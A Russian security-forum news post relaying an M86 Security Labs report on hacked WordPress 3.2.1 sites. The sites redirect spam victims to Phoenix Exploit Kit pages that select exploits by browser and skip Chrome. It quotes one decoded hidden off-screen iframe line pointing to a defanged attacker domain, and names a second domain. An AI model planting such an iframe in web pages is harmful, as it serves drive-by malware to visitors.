Phoenix Exploit Kit распознаёт и не трогает браузеры Google Chrome

Тема в разделе "Новости информационной безопасности", создана пользователем Hotab, 31 янв 2012.

  1. Hotab
    Оффлайн

    Hotab Активный пользователь

    Сообщения:
    1.169
    Симпатии:
    307
    пециалисты по безопасности из M86 Security Labs обнаружили массовое заражение сотен сайтов на движке WordPress 3.2.1. Используя известную уязвимость устаревшей версии WordPress и уже опубликованные эксплоиты для него (1, 2), злоумышленники внедряют жертве в папку Uploads файл HTML с редиректом на страницу с набором эксплоитов Phoenix Exploit Kit.

    Уже обнаружено как минимум 400 заражённых сайтов: выборка 1, выборка 2. Самим этим сайтам беспокоиться не о чём, они могут даже не заметить заражения. Злоумышленники используют их просто в качестве красивых URL, чтобы ссылка вызывала доверие у жертв (и чтобы проще обойти спам-фильтры), и рассылают спам, содержащий ссылку на вышеупомянутую страницу.

    [​IMG]

    Вот фрагмент обфусцированного этой страницы.
    [​IMG]

    Этот обфусцированный код ведёт на серверы из инфраструктуры Phoenix Exploit Kit. Проведя расшифровку вышеуказанного кода, можно расшифровать конкретные URL, куда происходит редирект. Например, horoshovsebudet.ru.

    Код (Text):
    IFRAME style=”RIGHT: -8710px; WIDTH: 0px; POSITION: fixed; HEIGHT: 24px” src=”hxxp://horoshovsebudet.ru:8801/html/yveveqduclirb1.php” frameborder=”0″
    Другой URL из той же инфраструктуры — hxxxp://monikabestolucci.ru:8801/html/yveveqduclirb1.php.

    При этом злоумышленники используют технику Fast Flux для динамического изменения соответствия между IP-адресом и доменным именем, так что данному домену соответствуют десятки IP-адресов.

    [​IMG]

    На сайте Phoenix Exploit Kit происходит распознавание юзер-агента жертвы и на него сваливается ряд экслоитов, характерных для его версии ОС и браузера. Например, при распознавании IE6 пользователь получает эксплоиты для Internet Explorer, Adobe PDF, Flash и Oracle Java.

    [​IMG]

    Судя по следующему скриншоту исходного кода Phoenix Exploit Kit по какой-то причине игнорирует пользователей браузера Google Chrome.
    [​IMG]
     
    2 пользователям это понравилось.

Поделиться этой страницей